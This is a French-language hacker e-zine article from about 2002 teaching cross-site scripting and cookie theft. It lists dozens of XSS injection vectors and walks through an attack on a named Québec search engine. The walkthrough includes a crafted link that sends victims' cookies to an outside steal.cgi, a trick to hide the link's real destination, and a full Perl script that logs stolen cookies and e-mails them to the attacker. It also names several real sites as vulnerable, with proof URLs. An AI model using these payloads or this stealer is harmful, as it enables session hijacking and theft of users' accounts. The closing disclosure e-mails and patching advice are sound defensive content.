__ ______
            __    __  __  _ ___   __       _  _   _   _\_ _  _   \
           /  \  /  \ \ \ \  _ \ \ .\     | |/ / / / / _  / /.\   \
     .- - / /\ \/ /\ \-\_\ \_\\_\-\_/ ----|   < /_/-/_//_/\/__/    \-  ------.
     :    \ \ \__/ / /                    |_|\_\           \        \        :
     ,     \/      \/                                       \        \       |
     :                                                       \        \      .
     . 11.11    Cross-Site Scripting, gimme a cookie          \        \     !
     .             aka                                         \        \    .
     ;             cookie-stealing, it's EVIL                   \        \   :
     :                                                           \        \  :
     '-- -----  - -------- --- --------- - --  ------------- --- -\        \-'
                                                                   \____ _ _\


C'est quoi le cross site scripting ?
------------------------------------

Bin, c'est une attaque qui consiste à faire exécuter des choses méchantes a une
application web pour voler des informations sur les utilisateurs. Par  exemple,
un hyper lien (merde l'Office de  la langue française doit être fier,  un terme
francophone dans Mindkind) qui contient des instructions autres que celles  que
l'utilisateur voit. (hen!, j'comprends pas pas). Humm ok peut-être qu'avec  des
exemples ça va mieux  aller. On peut faire  des attaques XSS (l'abréviation  de
cross site scripting) en javascript, activeX, vbscript, flash et même html.  On
les utilises souvent pour voler  des cookies aux utilisateurs, mais  aussi pour
spoofer (la  l'Office de  la langue  française m'emmerde  j'crois) une attaque,
faire du DoS (si si c'est  possible avec un peu d'imagination), etc.  Aussi, il
ne faut pas absolument cliquer sur  un lien pour être vulnérable à  une attaque
XSS,  il  est  possible de  faire  exécuter  le code  dans  un  html e-mail  ou
directement en visitant une page web. 

A l'attaque moussaillon
-----------------------
Bon, premièrement, il faut trouver une  faille XSS. Une méthode simple pour  en
découvrir est de remplacer n'importe quel données en user input par
<script>alert(document.cookie);</script>
Les meilleurs endroits pour chercher des failles XSS sont les CGI scripts,  les
engins de recherche, les forums interactifs, les pages d'erreurs personnalisées
etc... Voila des exemples d'endroits ou  vous pouvez insérer le evil code  dans
le code normal.

XSS common injection
--------------------
<a href="javas&#99;ript&#35;[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img src="livescript:[code]"> [N4]
<a href="about:<s&#99;ript>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script))<!-- -- -->
<<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]

Comme chez Mindkind  on est pas  cheap, on va  vous faire un  exemple réel mais
inutile  de  cookie stealing  à  l'aide d'une  attaque  XSS. Vu  qu'on  est des
comiques on a ciblé www.toile.qc.ca en hommage à Pierre-Karl Péladeau (osti  de
cave)

Tiens l'engin de recherche est vulnérable
URL preuve:

http://recherche.toile.qc.ca/cgi-bin/recherche?ou=T&q=&categorie=&ad=w5n2&client=
netgraphe&ie=latin1&oe=latin1&output=xml_no_dtd&ip=205.237.234.78&userid=netgraphe
&userip=205.237.234.78&start=0&num=20&lr=&query=%3Cscript%3Ealert%28
document.cookie%29%3B%3C%2Fscript%3E&x=24&y=7

Bon si vous avez visité www.toile.qc.ca le cookie va contenir de quoi (sinon il
n'apparaîtra rien parce qu'il va être vide)
Dans mon cas ça la donné un cookie contenant xs=2 (joie)
Bon on va voler les cookies des autres users.
Il faut procéder en 5 étapes :
1- Trouver une application  vulnérable au XSS qui  possède une forme de  login.
(si on veux voler quelque chose d'intéressant mais c'est pas notre cas, on  est
des théoriciens, pas des criminels)
C'est fait.
2- Envoyer une requête visant à voler le cookie d'un utilisateur de la toile du
Québec à l'utilisateur en question.  On peux utiliser le social  engineering ou
peu importe, tant qui  exécute le code dans  son browser. Pour l'exemple  on va
faire une page web bidon 

Code source de la page web:
<html>
<head>
<title>MindFlayR evil cookie stealing page</title>
</head>
<body>
<a href="http://recherche.toile.qc.ca/cgi-bin/recherche?page=1&lang=fr&operator=and&categorie=
&tronquer=&query=%3Cscript%3Edocument.location.replace%28%27http%3A%2F%2Fmindflayrwebsite.com
%2Fsteal.cgi%3F%27%2Bdocument.cookie%29%3B%3C%2Fscript%3E&x=12&y=15">
I will stole your cookie when you will click here
</a>
</body>
</html>

Comme  vous  pouvez peut-être  le  remarquer, la  requête  prend le  cookie  de
l'utilisateur qui click sur le lien et l'envoie à
                                          http://mindflayrwebsite.com/steal.cgi

Pour rendre l'attaque  encore plus subtile  il est possible  de cacher la  vrai
destination du lien avec un simple code
onMouseOver="window.status='http://www.legentilsitedeloncletom.com';return true"
onMouseOut="window.status='';return true">Visiter le gentil site de l'oncle Tom!
Il faut bien sûr insérer ce code à la place du texte "I will stole your  cookie
when you will click here " du premier code.

3- Quand l'utilisateur  click sur le  lien souhait visiter  le site de  ce cher
oncle   Tom,   le   cookie   est   envoyé   sur   le   script   steal.cgi    de
mindflayrwebsite.com.

4- Le script steal.cgi enregistre le cookie
Comme je suis trop  lâche pour coder un  cookie stealer moi même  j'ai emprunté
celui de David Endler de idefense (en fait c'est pas que je suis lâche mais  je
manque de  temps écrivant  mon article  a dernière  minute comme d'habitude)
[ Note de Last : t pas si pire MindFlou, ya du monde qui on  écrit leur article
après la dernière minute ;-) ]

------cookie stealer code-----
#!/usr/bin/perl
# steal.cgi by David Endler dendler@idefense.com
# Specific to your system
$mailprog = '/usr/sbin/sendmail';
# create a log file of cookies, we'll also email them too
open(COOKIES,">>stolen_cookie_file");
# what the victim sees, customize as needed
print "Content-type:text/html\n\n";
print <<EndOfHTML;
<html><head><title>Cookie Stealing</title></head>
<body>
Your Cookie has been stolen. Thank you.
</body></html>
EndOfHTML
# The QUERY_STRING environment variable should be filled with
# the cookie text after steal.cgi:
# http://www.attacker.com/steal.cgi?XXXXX
print COOKIES "$ENV{'QUERY_STRING'} from $ENV{`REMOTE_ADDR'}\n";

# now email the alert as well so we can start to hijack

open(MAIL,"|$mailprog -t");
print MAIL "To: attacker\@attacker.com\n";
print MAIL "From: cookie_steal\@attacker.com\n";
print MAIL "Subject: Stolen Cookie Submission\n\n";
print MAIL "-" x 75 . "\n\n";
print MAIL "$ENV{'QUERY_STRING'} from $ENV{`REMOTE_ADDR'}\n";
close (MAIL);

------end of code--------

5- Aller voir ses emails et récupérer le cookie fraîchement volé!

xss vuln too:
http://www.ulaval.ca/adul/rechercher.html
http://www.francite.com
http://www.normos.org/fr/textSearch.html
http://www.sierraflower.com/sff/search_fr.asp?NC=1&VarID=0&S_Param1=&L=2333318476235
http://www.emergis.com/fr/other/help/results.asp?Scope=all&q1=%3Cscript%3Ealert%28%27Mindkind+owned+your+ass%27%29%3B%3C%2Fscript%3E
http://www.montrealdvd.com/search.asp
http://search.canoe.ca/canoe/?lr=canoesearch&q=%3Cscript%3Ealert%28%27Mindkind+owned+your+ass%27%29%3B%3C%2Fscript%3E&ad=w5n2&client=netgraphe&ie=latin1&oe=latin1&output=xml_no_dtd&ip=205.237.234.78&userid=netgraphe&userip=205.237.234.78&start=0&num=20&adtest=off&x=12&y=7


Bon j'ai décidé d'aviser les  admins des problèmes de cross-site  scripting sur
leur site question de voir leur réaction.

Mon e-mail (envoyé vers le 1 décembre 2002)
----------
Bonjour, je vous écris pour vous  aviser d'un problème de sécurité sur  (le nom
du  site)  (en  fait  l'engin  de  recherche).  Il  suffit  d'injecter  du code
javascript  dans  la  boite  de requête  pour  le  faire  exécuter. (cross-site
scripting vulnerability)

<script>alert('Voila le probleme de sécurité');</script>
par exemple...

Voici quelques liens pour vous aider a régler le problème et sur cette sorte de
vulnérabilité :
http://www.cgisecurity.com/articles/xss-faq.shtml
http://www.cert.org/archive/pdf/cross_site_scripting.pdf
http://www.idefense.com/XSS.html
J'espère que ceci  pourra vous aider  et j'espère avoir  des nouvelles de  vous
très bientôt.

MindFlayR
mindflayr@mindkind.org
http://www.mindkind.org:8787/

Reponse (en date du 9 décembre 2002)
-------

admin@toile.com
---------------
Patch: Non
Reponse: Non

adul@adul.ulaval.ca
-------------------
Patch: Non
Reponse: Non

commentaires@francite.com
-------------------------
Patch: Oui
Reponse: Non

info@normos.org
---------------
Patch: Non
Reponse:Non

solutions@emergis.com
---------------------
Patch: Non
Reponse: Non

info@montrealdvd.com
--------------------
Patch: Non
Reponse: Non
Note:  montrealdvd.com semble  utiliser  une  vieille version  de Snitz  Forums
2000. La vulnérabilité de l'engin de  recherche n'apparaît pas nul part sur  le
web (après de courtes recherches) mais le problème semble réglé sur le site  de
Snitz (http://forum.snitz.com/).

Comme vous pouvez l'observer, seul francite a patché son engin de recherche  ce
qui semble démontrer que tout le  monde se fout complètement de la  sécurité au
québec.

En guise de conclusion, j'espère que vous avez comprit maintenant la menace que
représente les failles XSS et que vous  avez une bonne idée de la façon  de les
exploiter (et donc de patcher vos codes pour éviter cela). Je vous reviens dans
le prochain Mindkind avec quelques trucs croustillants.


            ___                                                           ___
     .----/   /----------- ---------- --------- - -- - - --- -----------/   /
     |   /   /                                                         /   /|
     :  /   /                                                         /   / :
     | /   /                mindflayr@mindkind.org                   /   /  |
     |/   /                                                         /   /   |
     /___/-- ---------- -----  ----------------- - ------- -- --- -/___/----'